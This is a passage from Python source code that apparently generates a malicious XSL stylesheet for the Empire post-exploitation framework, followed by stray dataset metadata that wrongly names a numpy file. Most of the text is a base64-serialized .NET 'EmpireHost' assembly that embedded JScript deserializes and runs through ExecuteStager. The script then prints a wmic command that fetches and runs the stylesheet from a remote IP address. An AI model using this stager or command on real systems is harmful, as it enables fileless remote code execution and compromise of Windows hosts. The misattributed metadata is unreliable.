"aXplAHNldF9XaW5kb3dTaXplAGdldF9NYXhQaHlzaWNhbFdpbmRvd1NpemUAU2V0V2luZG93U2l6"+ "ZQBnZXRfTWF4V2luZG93U2l6ZQBTaXplT2YAUHJvbXB0Rm9yQ3JlZGVudGlhbHNGbGFnAFByb21w"+ "dEZvcldpbmRvd3NDcmVkZW50aWFsc0ZsYWcAU3lzdGVtLlRocmVhZGluZwBFbmNvZGluZwBGcm9t"+ "QmFzZTY0U3RyaW5nAFByb21wdEZvckNyZWRlbnRpYWxzV2l0aFNlY3VyZVN0cmluZwBQcm9tcHRG"+ "b3JXaW5kb3dzQ3JlZGVudGlhbHNXaXRoU2VjdXJlU3RyaW5nAFByb21wdFdpdGhTZWN1cmVTdHJp"+ "bmcAUHRyVG9TZWN1cmVTdHJpbmcAQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcFNl"+ "Y3VyZVN0cmluZwBSZWFkTGluZUFzU2VjdXJlU3RyaW5nAFRvU3RyaW5nAEdldFN0cmluZwBTdWJz"+ "dHJpbmcARm9yRWFjaABHZXRBbGxVc2Vyc0ZvbGRlclBhdGgAR2V0Rm9sZGVyUGF0aABQb3dlclNo"+ "ZWxsUm9vdEtleVBhdGgAZ2V0X1dpZHRoAGdldF9CdWZmZXJXaWR0aABnZXRfV2luZG93V2lkdGgA"+ "Z2V0X0xhcmdlc3RXaW5kb3dXaWR0aABnZXRfTGVuZ3RoAGxlbmd0aABteVJhd1VpAFB0clRvU3Ry"+ "aW5nVW5pAGluc3RhbmNlTG9jawBNYXJzaGFsAFBTQ3JlZGVudGlhbABQcm9tcHRGb3JDcmVkZW50"+ "aWFsAFByb21wdEZvckNyZWRlbnRpYWxzSW50ZXJuYWwAUHJvbXB0Rm9yV2luZG93c0NyZWRlbnRp"+ "YWxzSW50ZXJuYWwAZ2V0X0xhYmVsAEdldEhvdGtleUFuZExhYmVsAHNldF9DYW5jZWwAU3lzdGVt"+ "LkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsAFN5c3RlbS5Db21wb25lbnRNb2RlbABvbGUzMi5kbGwA"+ "Y3JlZHVpLmRsbABFbXBpcmVIb3N0LmRsbABCdWZmZXJDZWxsAGN1cnJlbnRQb3dlclNoZWxsAGZp"+ "bGwAcHJvZ3JhbQBSZUFsbG9jQ29UYXNrTWVtAGdldF9JdGVtAHNldF9JdGVtAE9wZXJhdGluZ1N5"+ "c3RlbQBUcmltAEVudW0AT3BlbgBvcmlnaW4AZ2V0X09TVmVyc2lvbgBnZXRfVmVyc2lvbgBJSG9z"+ "dFN1cHBvcnRzSW50ZXJhY3RpdmVTZXNzaW9uAE5vdGlmeUVuZEFwcGxpY2F0aW9uAE5vdGlmeUJl"+ "Z2luQXBwbGljYXRpb24AZ2V0X0xvY2F0aW9uAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24A"+ "ZGVzdGluYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ASUhvc3RVSVN1cHBvcnRzTXVsdGlwbGVD"+ "aG9pY2VTZWxlY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24AQ29tbWFuZENvbGxlY3Rpb24AZ2V0X0N1"+ "cnNvclBvc2l0aW9uAHNldF9DdXJzb3JQb3NpdGlvbgBnZXRfV2luZG93UG9zaXRpb24Ac2V0X1dp"+ "bmRvd1Bvc2l0aW9uAFNldFdpbmRvd1Bvc2l0aW9uAGdldF9DYXB0aW9uAHNldF9DYXB0aW9uAF9j"+ "YXB0aW9uAFdpbjMyRXhjZXB0aW9uAE5vdEltcGxlbWVudGVkRXhjZXB0aW9uAEFyZ3VtZW50T3V0"+ "T2ZSYW5nZUV4Y2VwdGlvbgBSdW50aW1lRXhjZXB0aW9uAEFyZ3VtZW50TnVsbEV4Y2VwdGlvbgBS"+ "ZXBvcnRFeGNlcHRpb24AU2VjdXJpdHlFeGNlcHRpb24ARmllbGREZXNjcmlwdGlvbgBDaG9pY2VE"+ "ZXNjcmlwdGlvbgBvcmlnaW5hbFVJQ3VsdHVyZUluZm8Ab3JpZ2luYWxDdWx0dXJlSW5mbwBQU0lu"+ "dm9jYXRpb25TdGF0ZUluZm8AZ2V0X0ludm9jYXRpb25TdGF0ZUluZm8AcFVpSW5mbwBLZXlJbmZv"+ "AFBTUHJvcGVydHlJbmZvAFplcm8AQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcABj"+ "bGlwAGdldF9XaW5kb3dUb3AAU3RvcABTeXN0ZW0uTGlucQBBcHBlbmRDaGFyAElGb3JtYXRQcm92"+ "aWRlcgBTdHJpbmdCdWlsZGVyAFNwZWNpYWxGb2xkZXIAc2VuZGVyAGNiQXV0aEJ1ZmZlcgBwdklu"+ "QXV0aEJ1ZmZlcgBwQXV0aEJ1ZmZlcgByZWZPdXRBdXRoQnVmZmVyAHBwdk91dEF1dGhCdWZmZXIA"+ "Q3JlZFBhY2tBdXRoZW50aWNhdGlvbkJ1ZmZlcgBDcmVkVW5QYWNrQXV0aGVudGljYXRpb25CdWZm"+ "ZXIARmx1c2hJbnB1dEJ1ZmZlcgBzZXRfQXV0aG9yaXphdGlvbk1hbmFnZXIARXhlY3V0ZVN0YWdl"+ "cgBFbXBpcmVMaXN0ZW5lcgBnZXRfSGJtQmFubmVyAHNldF9IYm1CYW5uZXIAaGJtQmFubmVyAGV4"+ "ZWN1dGVIZWxwZXIAVG9VcHBlcgBmb3JDdXJyZW50VXNlcgBBZGRQYXJhbWV0ZXIASW52YWxpZFBh"+ "cmFtZXRlcgBFbnRlcgBnZXRfTWFqb3IAZ2V0X0ZvcmVncm91bmRDb2xvcgBzZXRfRm9yZWdyb3Vu"+ "ZENvbG9yAGZvcmVncm91bmRDb2xvcgBnZXRfQmFja2dyb3VuZENvbG9yAHNldF9CYWNrZ3JvdW5k"+ "Q29sb3IAYmFja2dyb3VuZENvbG9yAENvbnNvbGVDb2xvcgBHZXRMYXN0V2luMzJFcnJvcgBkd0F1"+ "dGhFcnJvcgBhdXRoRXJyb3IASUVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgAuY3RvcgAuY2N0b3IA"+ "TW9uaXRvcgBhdXRoQnVmZmVyUHRyAEludFB0cgBwdHIAU3lzdGVtLkRpYWdub3N0aWNzAGdldF9D"+ "b21tYW5kcwBzZXRfQ29tbWFuZHMAR2V0UHJvZmlsZUNvbW1hbmRzAE5hdGl2ZU1ldGhvZHMARXh0"+ "ZW5zaW9uTWV0aG9kcwBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcwBkZWZh"+ "dWx0Q2hvaWNlcwBjaG9pY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u"+ "UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEhvc3RVdGlsaXRpZXMAZ2V0"+ "X1Byb3BlcnRpZXMAUFNDcmVkZW50aWFsVHlwZXMAYWxsb3dlZENyZWRlbnRpYWxUeXBlcwBQaXBl"+ "bGluZVJlc3VsdFR5cGVzAENvb3JkaW5hdGVzAGdldF9GbGFncwBzZXRfRmxhZ3MASW52YWxpZEZs"+ "YWdzAGR3RmxhZ3MAZmxhZ3MAQ29uc29sZUNhbmNlbEV2ZW50QXJncwBwY2JQYWNrZWRDcmVkZW50"+ "aWFscwBwUGFja2VkQ3JlZGVudGlhbHMAZGVjcnlwdFByb3RlY3RlZENyZWRlbnRpYWxzAENyZWRV"+ "SVByb21wdEZvckNyZWRlbnRpYWxzAENyZWRVSVByb21wdEZvcldpbmRvd3NDcmVkZW50aWFscwBC"+ "dWlsZEhvdGtleXNBbmRQbGFpbkxhYmVscwBTeXN0ZW0uQ29sbGVjdGlvbnMAUFNDcmVkZW50aWFs"+ "VUlPcHRpb25zAFNjb3BlZEl0ZW1PcHRpb25zAFByb21wdEZvckNyZWRlbnRpYWxzT3B0aW9ucwBQ"+ "cm9tcHRGb3JXaW5kb3dzQ3JlZGVudGlhbHNPcHRpb25zAFJlYWRLZXlPcHRpb25zAGRlc2NyaXB0"+ "aW9ucwBvcHRpb25zAGdldF9DaGFycwB1bFBhc3N3b3JkTWF4Q2hhcnMAdWxVc2VyTmFtZU1heENo"+ "YXJzAFN1Y2Nlc3MAV3JpdGVQcm9ncmVzcwBNZXJnZU15UmVzdWx0cwBTY3JvbGxCdWZmZXJDb250"+ "ZW50cwBHZXRCdWZmZXJDb250ZW50cwBTZXRCdWZmZXJDb250ZW50cwBjb250ZW50cwBFeGlzdHMA"+ "Y3VycmVudFVzZXJBbGxIb3N0cwBhbGxVc2Vyc0FsbEhvc3RzAENvbmNhdABBcHBlbmRGb3JtYXQA"+ "QXNQU09iamVjdABnZXRfQmFzZU9iamVjdABHZXQAU2V0AGdldF9XaW5kb3dMZWZ0AGdldF9IZWln"+ "aHQAZ2V0X0J1ZmZlckhlaWdodABnZXRfV2luZG93SGVpZ2h0AGdldF9MYXJnZXN0V2luZG93SGVp"+ "Z2h0AFNwbGl0AGdldF9TaG91bGRFeGl0AHNldF9TaG91bGRFeGl0AFNldFNob3VsZEV4aXQAc2hv"+ "dWxkRXhpdABDcmVhdGVEZWZhdWx0AFByb21wdENyZWRlbnRpYWxzU2VjdXJlU3RyaW5nUmVzdWx0"+ "AElQcm9tcHRDcmVkZW50aWFsc1Jlc3VsdAByZXN1bHQARW52aXJvbm1lbnQAZ2V0X0h3bmRQYXJl"+ "bnQAc2V0X0h3bmRQYXJlbnQAaHduZFBhcmVudABnZXRfQ3VycmVudABnZXRfQ291bnQAQWRkU2Ny"+ "aXB0AEVudGVyTmVzdGVkUHJvbXB0AEV4aXROZXN0ZWRQcm9tcHQAQ29udmVydABUb0xpc3QAU3lz"+ "dGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0AFBTSG9zdABFbXBpcmVIb3N0AGN1cnJlbnRV"+ "c2VyQ3VycmVudEhvc3QAYWxsVXNlcnNDdXJyZW50SG9zdABNeUhvc3QAbXlIb3N0AGlucHV0AE1v"+ "dmVOZXh0AFN5c3RlbS5UZXh0AHBzek1lc3NhZ2VUZXh0AHBzekNhcHRpb25UZXh0AFRvQXJyYXkA"+ "VG9DaGFyQXJyYXkAT3BlblN1YktleQBSZWFkS2V5AFBvd2VyU2hlbGxFbmdpbmVLZXkAUmVnaXN0"+ "cnlWZXJzaW9uS2V5AFJlZ2lzdHJ5S2V5AEdldEFzc2VtYmx5AEdldEVudHJ5QXNzZW1ibHkATWFr"+ "ZVJlYWRPbmx5AEVycm9yQ2F0ZWdvcnkAUnVuc3BhY2VGYWN0b3J5AFJlZ2lzdHJ5AGdldF9DYXBh"+ "Y2l0eQBzZXRfQ2FwYWNpdHkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0eQBTeXN0ZW0uU2VjdXJp"+ "dHkASXNOdWxsT3JFbXB0eQBQU05vdGVQcm9wZXJ0eQAAAAtEAHUAbQBtAHkAABVQAG8AdwBlAHIA"+ "UwBoAGUAbABsAAAXbwB1AHQALQBkAGUAZgBhAHUAbAB0AAEpSABvAHMAdAAuAFIAZQBwAG8AcgB0"+ "AEUAeABjAGUAcAB0AGkAbwBuAAANJABpAG4AcAB1AHQAABVvAHUAdAAtAHMAdAByAGkAbgBnAAEN"+ "RQBtAHAAaQByAGUAAIClQwBhAG4AbgBvAHQAIABzAHUAcwBwAGUAbgBkACAAdABoAGUAIABzAGgA"+ "ZQBsAGwALAAgAEUAbgB0AGUAcgBOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABtAGUAdABo"+ "AG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AEgA"+ "bwBzAHQALgAAd1QAaABlACAARQB4AGkAdABOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABt"+ "AGUAdABoAG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAA"+ "TQB5AEgAbwBzAHQALgAAAwoAAAMgAAAVfAB7ADAAfQA+ACAAewAxAH0AIAAAI1sARABlAGYAYQB1"+ "AGwAdAAgAGkAcwAgACgAewAwAH0AXQAAIUkAbgB2AGEAbABpAGQAIABjAGgAbwBpAGMAZQA6ACAA"+ "ACtbAEQAZQBmAGEAdQBsAHQAIABjAGgAbwBpAGMAZQBzACAAYQByAGUAIAAAJ1sARABlAGYAYQB1"+ "AGwAdAAgAGMAaABvAGkAYwBlACAAaQBzACAAAA0iAHsAMAB9ACIALAAAA10AABlDAGgAbwBpAGMA"+ "ZQBbAHsAMAB9AF0AOgAAFUQARQBCAFUARwA6ACAAewAwAH0AABlWAEUAUgBCAE8AUwBFADoAIAB7"+ "ADAAfQAAGVcAQQBSAE4ASQBOAEcAOgAgAHsAMAB9AAAhQQBsAGwAVQBzAGUAcgBzAEEAbABsAEgA"+ "bwBzAHQAcwAAJ0EAbABsAFUAcwBlAHIAcwBDAHUAcgByAGUAbgB0AEgAbwBzAHQAACdDAHUAcgBy"+ "AGUAbgB0AFUAcwBlAHIAQQBsAGwASABvAHMAdABzAAAtQwB1AHIAcgBlAG4AdABVAHMAZQByAEMA"+ "dQByAHIAZQBuAHQASABvAHMAdAAAGXMAZQB0AC0AdgBhAHIAaQBhAGIAbABlAAEJTgBhAG0AZQAA"+ "D3AAcgBvAGYAaQBsAGUAAAtWAGEAbAB1AGUAAA1PAHAAdABpAG8AbgAAI1cAaQBuAGQAbwB3AHMA"+ "UABvAHcAZQByAFMAaABlAGwAbAAAF3AAcgBvAGYAaQBsAGUALgBwAHMAMQAAIXAAcgBvAGYAaQBs"+ "AGUAXwB0AGUAcwB0AC4AcABzADEAAANfAABhUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMA"+ "bwBmAHQAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAMQBcAFAAbwB3AGUAcgBTAGgAZQBsAGwARQBu"+ "AGcAaQBuAGUAAB9BAHAAcABsAGkAYwBhAHQAaQBvAG4AQgBhAHMAZQAAgItUAGgAZQAgAEMAdQBy"+ "AHMAbwByAFAAbwBzAGkAdABpAG8AbgAgAHAAcgBvAHAAZQByAHQAeQAgAGkAcwAgAG4AbwB0ACAA"+ "aQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AFIAYQB3AFUAcwBlAHIASQBuAHQAZQBy"+ "AGYAYQBjAGUALgAAgI1UAGgAZQAgAEcAZQB0AEIAdQBmAGYAZQByAEMAbwBuAHQAZQBuAHQAcwAg"+ "AG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkA"+ "IABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAAB9VABoAGUAIABSAGUAYQBk"+ "AEsAZQB5ACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4A"+ "dABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAl1QA"+ "aABlACAAUwBjAHIAbwBsAGwAQgB1AGYAZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0"+ "AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkA"+ "UgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAkVQAaABlACAAUwBlAHQAQgB1AGYA"+ "ZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABp"+ "AG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIA"+ "ZgBhAGMAZQAuAAAPbwBwAHQAaQBvAG4AcwAAEXUAcwBlAHIATgBhAG0AZQAANUMAUgBFAEQAVQBJ"+ "AF8ATQBBAFgAXwBVAFMARQBSAE4AQQBNAEUAXwBMAEUATgBHAFQASAAAEXAAYQBzAHMAdwBvAHIA"+ "ZAAANUMAUgBFAEQAVQBJAF8ATQBBAFgAXwBQAEEAUwBTAFcATwBSAEQAXwBMAEUATgBHAFQASAAA"+ "C3YAYQBsAHUAZQAAD2MAYQBwAHQAaQBvAG4AAA9tAGUAcwBzAGEAZwBlAACjYeiU2ONRRKeNL06S"+ "sHvIAAMgAAEEIAEBCAUgAQERFQQgAQEOBCABAQIDBwEOBQAAEoD5BQABHQUOBSABDh0FCwcFEk0c"+ "HRJRCBJRBAAAEk0GIAEBEoEBCAACEkkScRJNBAABARwEAAASRQUgAQESSQUgAQESUQggABUSXQES"+ "YQMHARwEAAECDgUgARJFDgQgABJRBSAAEoERBxUSXQESgRUFIAETAAgJIAIBEYEZEYEZCyABFRJd"+ "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"+ "RBKAtRKAtQYgAQESgLUGAAESgLUOAyAAGAQgAQEYBCAAETgFIAEBETgEIAARPAUgAQERPAYgAwEO"+ "Dg4RAAoRUBJUDhgIGAgYCBACETwTAAkRUBJUCBAIGAgQGBAIEAIROAkABQIIDg4YEAgJAAUCCBgY"+ "GBAIFQAJAggYCBKAjRAIEoCNEAgSgI0QCA8ACQIIGAgYEAgYEAgYEAgHAAMSKAIYCAcAAxIsAhgI"+ "BgABEoC1GAcAAhKAtRgIAygAAgMoAAgEKAASfQQoABF5AygADgUoABKAgQUoABKAhQQoABJJBSgA"+ "EoCRBSgAEYC5BSgAEYDVBSgAEYDZBSgAEoC1AygAGAQoABE4BCgAETwIAQAIAAAAAAAeAQABAFQC"+ "FldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkVtcGlyZUhvc3QAAAUBAAAAABcB"+ "ABJDb3B5cmlnaHQgwqkgIDIwMTcAACkBACQyZWI5ZGQxMC1iNGY5LTQ2NDctYjFjMy0yNWMwOTky"+ "OTc5MDUAAAwBAAcxLjAuMC4wAAAFAQABAAAAAAAAAAAAIvEzWQAAAAACAAAAHAEAAFiQAABYcgAA"+ "UlNEU9NhchFbyoVAkiWQmGgji+sBAAAAQzpcRGV2ZWxvcG1lbnRcRW1waXJlSG9zdFxFbXBpcmVI"+ "b3N0XG9ialxSZWxlYXNlXEVtcGlyZUhvc3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACc"+ "kQAAAAAAAAAAAAC2kQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqJEAAAAAAAAAAAAAAABfQ29y"+ "RGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA"+ "AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFigAAAsAwAAAAAAAAAAAAAs"+ "AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAA"+ "AQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu"+ "AGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEjAIAAAEAUwB0AHIA"+ "aQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAaAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBv"+ "AG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAD4A"+ "CwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABFAG0AcABpAHIAZQBIAG8AcwB0"+ "AAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA+AA8A"+ "AQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAbQBwAGkAcgBlAEgAbwBzAHQALgBkAGwAbAAA"+ "AAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQA"+ "IACpACAAIAAyADAAMQA3AAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAA"+ "AAAAAABGAA8AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQBtAHAAaQByAGUA"+ "SABvAHMAdAAuAGQAbABsAAAAAAA2AAsAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEUAbQBw"+ "AGkAcgBlAEgAbwBzAHQAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEA"+ "LgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAu"+ "ADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAAADAAAAMgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3Rl"+ "bS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA"; var entry_class = 'EmpireHost'; try { setversion(); var stm = base64ToStream(serialized_obj); var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); var al = new ActiveXObject('System.Collections.ArrayList'); var n = fmt.SurrogateSelector; var d = fmt.Deserialize_2(stm); al.Add(n); var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); o.ExecuteStager(EncodedPayload); } catch (e) { debug(e.message); } ]]></ms:script> </stylesheet> """ command = """\n[+] wmic process get brief /format:"http://10.10.10.10/launcher.xsl" """ print colored(command, 'green', attrs=['bold']) return code
bsd-3-clause
-4,492,481,551,449,662,500
82.566216
209
0.755138
false
2.072769
false
false
false
grlee77/numpy
numpy/f2py/crackfortran.py
1
130739
